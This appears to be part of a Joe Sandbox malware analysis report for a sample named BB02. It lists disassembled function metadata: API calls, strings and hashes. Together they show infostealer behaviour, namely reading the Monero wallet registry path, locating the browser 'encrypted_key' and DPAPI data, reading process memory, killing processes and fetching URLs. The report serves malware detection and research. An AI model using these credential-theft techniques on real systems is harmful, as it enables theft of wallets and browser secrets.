Part of subcall function 00427210: lstrcpy.KERNEL32(00000000,ERROR), ref: 0042722E

lstrcpy.KERNEL32(00000000,0043520C), ref: 0040A012

Strings

v10, xrefs: 00409E9C
v20, xrefs: 00409E5E
@, xrefs: 00409EE8

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpymemcmp$AllocLocalmemset
String ID: @$v10$v20
API String ID: 3420379846-278772428
Opcode ID: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
Instruction ID: 83ac3224cdaa42a2a44bfc4cbeb411fde6a44a78649a1401cb5d7513f19e7b50
Opcode Fuzzy Hash: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
Instruction Fuzzy Hash: F9519D71A002199BDB10EF65DC45B9F77A4AF04318F14407AF949BB2D2DBB8ED058BD8

Function 024FE3D0 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 024FE3F6
lstrcat.KERNEL32(?,00000000), ref: 024FE404
lstrcat.KERNEL32(?,?), ref: 024FE41F
lstrcat.KERNEL32(?,?), ref: 024FE433
lstrcat.KERNEL32(?,00638A84), ref: 024FE447
lstrcat.KERNEL32(?,?), ref: 024FE45B
lstrcat.KERNEL32(?,00638AC8), ref: 024FE46E
lstrcpy.KERNEL32(00000000,?), ref: 024FE4A6
GetFileAttributesA.KERNEL32(00000000), ref: 024FE4AD

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$AttributesFile
String ID:
API String ID: 3428472996-0
Opcode ID: 55c52c1f62f8efd274b96c816be001393c03f7b4ce265de6d3a978105c0cffea
Instruction ID: f0835f647b528755c3fc03ae8d820aa465f1123c608004facc6a0c2cd9833323
Opcode Fuzzy Hash: 55c52c1f62f8efd274b96c816be001393c03f7b4ce265de6d3a978105c0cffea
Instruction Fuzzy Hash: E94184B19001289FDF54DF74DC48ADD77BAAF88301F1049AAE95A93250DBB49F85CF90

Function 024FC642 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145stringCOMMON

Download Yara Rule

APIs

Part of subcall function 025075A7: lstrlen.KERNEL32(------,024E5D82), ref: 025075B2
Part of subcall function 025075A7: lstrcpy.KERNEL32(00000000), ref: 025075D6
Part of subcall function 025075A7: lstrcat.KERNEL32(?,------), ref: 025075E0

Part of subcall function 02507517: lstrcpy.KERNEL32(00000000), ref: 02507545

Part of subcall function 02507557: lstrcpy.KERNEL32(00000000), ref: 02507586
Part of subcall function 02507557: lstrcat.KERNEL32(00000000), ref: 02507592

lstrcpy.KERNEL32(00000000,?), ref: 024FC736
lstrcpy.KERNEL32(00000000,?), ref: 024FC75F
ShellExecuteEx.SHELL32(0000003C), ref: 024FC7CB

Strings

(QC, xrefs: 024FC6B0
(QC, xrefs: 024FC6F0
<, xrefs: 024FC77F
"" , xrefs: 024FC68C

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: "" $(QC$(QC$<
API String ID: 3031569214-2404812987
Opcode ID: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
Instruction ID: c8fe2b93397bf7f005e8e7969f8fdbc0d5ef1a467a9a2613dfe9405d74f55c9f
Opcode Fuzzy Hash: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
Instruction Fuzzy Hash: 9B51097190029A8FCB50EF79DCC099DBBF6AF88309F15486AD905AB651DB34AD46CF80

Function 00401000 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
HeapAlloc.KERNEL32(00000000), ref: 0040101C
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
RegCloseKey.ADVAPI32(?), ref: 0040105D

Strings

wallet_path, xrefs: 0040104D
SOFTWARE\monero-project\monero-core, xrefs: 0040102F

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3466090806-4244082812
Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction ID: 56cdd2726f40904dd9986b82161546f6f5fb1bd65c94bb362b351e19f11762fa
Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction Fuzzy Hash: B2F09075A40308BFD7049BA09C4DFEB7B7DEB04715F100059FE05E2290D7B45A448BE0

Function 024E9357 Relevance: 12.2, APIs: 8, Instructions: 161networkfilestringCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 024E9376
InternetOpenUrlA.WININET(00000000,004350EC,00000000,00000000,80000000,00000000), ref: 024E9393
InternetCloseHandle.WININET(00000000), ref: 024E93A0

Part of subcall function 024F8117: memchr.MSVCRT ref: 024F8156
Part of subcall function 024F8117: memcmp.MSVCRT(00000000,?,?,?,00435108,00000000), ref: 024F8170
Part of subcall function 024F8117: memchr.MSVCRT ref: 024F818F

Part of subcall function 024E8C17: std::_Xinvalid_argument.LIBCPMT ref: 024E8C2D

strlen.MSVCRT ref: 024E93BC
InternetReadFile.WININET(?,?,?,00000000), ref: 024E93FD
InternetReadFile.WININET(00000000,?,00001000,?), ref: 024E942E
InternetCloseHandle.WININET(00000000), ref: 024E9439
InternetCloseHandle.WININET(00000000), ref: 024E9440

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_strlen
String ID:
API String ID: 1093921401-0
Opcode ID: 2df68befe2a48d953af9806ad3ef1aaa75e141ea7b2b3915444889022231d2c0
Instruction ID: a71c2ea89c7d67b4d22c6ee014ae4302a584c52f0f4bef3ef1e5f3b67f1fb328
Opcode Fuzzy Hash: 2df68befe2a48d953af9806ad3ef1aaa75e141ea7b2b3915444889022231d2c0
Instruction Fuzzy Hash: 4A51E471A00304ABEB20DFA8DC44BEEF7F9EF48715F14012AE505E3290DBB4DA458BA5

Function 00424760 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424779
Process32First.KERNEL32(00000000,00000128), ref: 00424789
Process32Next.KERNEL32(00000000,00000128), ref: 0042479B
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004247BC
TerminateProcess.KERNEL32(00000000,00000000), ref: 004247CB
CloseHandle.KERNEL32(00000000), ref: 004247D2
Process32Next.KERNEL32(00000000,00000128), ref: 004247E0
CloseHandle.KERNEL32(00000000), ref: 004247EB

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction ID: 367f00e3fac1ad323777d3cfb6a9c31bedb6582ea87d99118442d47bc1b8c7be
Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction Fuzzy Hash: 65019271701224AFE7215B30ACC9FEB777DEB88751F00119AF905D2290EFB48D908AA4

Function 024EE756 Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 024EEB2A
lstrcpy.KERNEL32(00000000,?), ref: 024EEB5C
lstrcpy.KERNEL32(00000000,?), ref: 024EEBAB
lstrcpy.KERNEL32(00000000,?), ref: 024EEBD1
lstrcpy.KERNEL32(00000000,?), ref: 024EEC09
FindNextFileA.KERNEL32(00000000,?), ref: 024EEC3F
FindClose.KERNEL32(00000000), ref: 024EEC4E

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$CloseFileNext
String ID:
API String ID: 1875835556-0
Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction ID: 9119423caae419c5d980d07607beee59651b3e3e9c1645f4756d6cfa76916909
Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction Fuzzy Hash: 7702ED70B112118FEF28CF19C544B6AB7E5AF4472AF19C1AED80A9B3A1D772D842CF51

Function 024EE7DB Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 024EEB2A
lstrcpy.KERNEL32(00000000,?), ref: 024EEB5C
lstrcpy.KERNEL32(00000000,?), ref: 024EEBAB
lstrcpy.KERNEL32(00000000,?), ref: 024EEBD1
lstrcpy.KERNEL32(00000000,?), ref: 024EEC09
FindNextFileA.KERNEL32(00000000,?), ref: 024EEC3F
FindClose.KERNEL32(00000000), ref: 024EEC4E

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$CloseFileNext
String ID:
API String ID: 1875835556-0
Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction ID: 9119423caae419c5d980d07607beee59651b3e3e9c1645f4756d6cfa76916909
Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction Fuzzy Hash: 7702ED70B112118FEF28CF19C544B6AB7E5AF4472AF19C1AED80A9B3A1D772D842CF51

Function 024EE7FC Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 024EEB2A
lstrcpy.KERNEL32(00000000,?), ref: 024EEB5C
lstrcpy.KERNEL32(00000000,?), ref: 024EEBAB
lstrcpy.KERNEL32(00000000,?), ref: 024EEBD1
lstrcpy.KERNEL32(00000000,?), ref: 024EEC09
FindNextFileA.KERNEL32(00000000,?), ref: 024EEC3F
FindClose.KERNEL32(00000000), ref: 024EEC4E

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$CloseFileNext
String ID:
API String ID: 1875835556-0
Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction ID: 9119423caae419c5d980d07607beee59651b3e3e9c1645f4756d6cfa76916909
Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction Fuzzy Hash: 7702ED70B112118FEF28CF19C544B6AB7E5AF4472AF19C1AED80A9B3A1D772D842CF51

Function 02502377 Relevance: 10.7, APIs: 7, Instructions: 224stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0250238A
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,02502686,00000000,00000000,00000000), ref: 025023B8
VirtualQueryEx.KERNEL32(00000000,00000000,?,0000001C), ref: 02502408
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 02502469

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtualstrlen
String ID:
API String ID: 3366127311-0
Opcode ID: 237dd88af5c74adab4b13bca57ee1463c3df570b0aab9420e182108aa891172b
Instruction ID: 2f573c0f34d842a5b50d910b403c907087688d40a1e039c3f6150ce12cada47f
Opcode Fuzzy Hash: 237dd88af5c74adab4b13bca57ee1463c3df570b0aab9420e182108aa891172b
Instruction Fuzzy Hash: E671A671A001159BDB14CF68DCD8AAEBBB6FB88714F148529FD15EB280D734DD41CBA8

Function 00407130 Relevance: 10.6, APIs: 7, Instructions: 141memorylibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 0040717E
GetProcessHeap.KERNEL32(00000008,00000010), ref: 004071B9
HeapAlloc.KERNEL32(00000000), ref: 004071C0
memcpy.MSVCRT(00000000,?), ref: 004071ED
GetProcessHeap.KERNEL32(00000000,?), ref: 00407203
HeapFree.KERNEL32(00000000), ref: 0040720A
GetProcAddress.KERNEL32(00000000,?), ref: 00407269

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Heap$Process$AddressAllocFreeLibraryLoadProcmemcpy
String ID:
API String ID: 1745114167-0
Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction ID: 12ab2d4fc661ad8143b60d879bbfd3a328605d63d86a8d422f2a9a3c01bded70
Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction Fuzzy Hash: FE416D71B046059BD720CFA9DC84BAAB3E9FB84305F1445BEE849D7380E739E8508B65

Function 024E7397 Relevance: 10.6, APIs: 7, Instructions: 141memorylibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 024E73E5
GetProcessHeap.KERNEL32(00000008,00000010), ref: 024E7420
RtlAllocateHeap.NTDLL(00000000), ref: 024E7427
memcpy.MSVCRT(00000000,?), ref: 024E7454
GetProcessHeap.KERNEL32(00000000,?), ref: 024E746A
HeapFree.KERNEL32(00000000), ref: 024E7471
GetProcAddress.KERNEL32(00000000,?), ref: 024E74D0

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Heap$Process$AddressAllocateFreeLibraryLoadProcmemcpy
String ID:
API String ID: 413393563-0
Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction ID: 5e62806307f2db58f221ece2c9c014f9030fbc1017a33796808fa8453dc4d168
Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction Fuzzy Hash: F2416171B006059BEB20CF69EC847A6F7E9EF8431AF1445AAE94EC7300E775E910CB50

Function 00409CD0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 123memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 00409D08
LocalAlloc.KERNEL32(00000040,?), ref: 00409D3A
StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D63
memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D9C

Strings

"encrypted_key":", xrefs: 00409D5D
, xrefs: 00409DC5
DPAPI, xrefs: 00409D96

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: AllocLocallstrcpymemcmp
String ID: $"encrypted_key":"$DPAPI
API String ID: 4154055062-738592651
Opcode ID: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
Instruction ID: 867cb166c61f41a869f23d409f67d1e1a1a1e3bdbbf69cd9a3e784fd9bca4893
Opcode Fuzzy Hash: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
Instruction Fuzzy Hash: 76418A71A0020A9BDB10EF65CD856AF77B5AF44308F04417AE954BB3E2DA78ED05CB98

Function 00417F60 Relevance: 10.6, APIs: 7, Instructions: 118stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00417F84
lstrlenA.KERNEL32(00000000), ref: 00417FB1
lstrcpy.KERNEL32(00000000,00000000), ref: 00417FE0
strtok_s.MSVCRT ref: 00417FF1
StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418025
StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418053
StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418087

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
Instruction ID: 476cfacc260c43b9b6707cb97608d97a847e356c1d56728458ea849191fa1f26
Opcode Fuzzy Hash: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
Instruction Fuzzy Hash: D0417F34A0450ADFCB21DF18D884EEB77B4FF44304F12409AE805AB351DB79AAA6CF95

Function 024F8347 Relevance: 10.6, APIs: 7, Instructions: 112stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 024F836C
lstrlen.KERNEL32(00000000), ref: 024F83B2
lstrcpy.KERNEL32(00000000,00000000), ref: 024F83E1
StrCmpCA.SHLWAPI(00000000,00435204), ref: 024F83F9
lstrlen.KERNEL32(00000000), ref: 024F8437
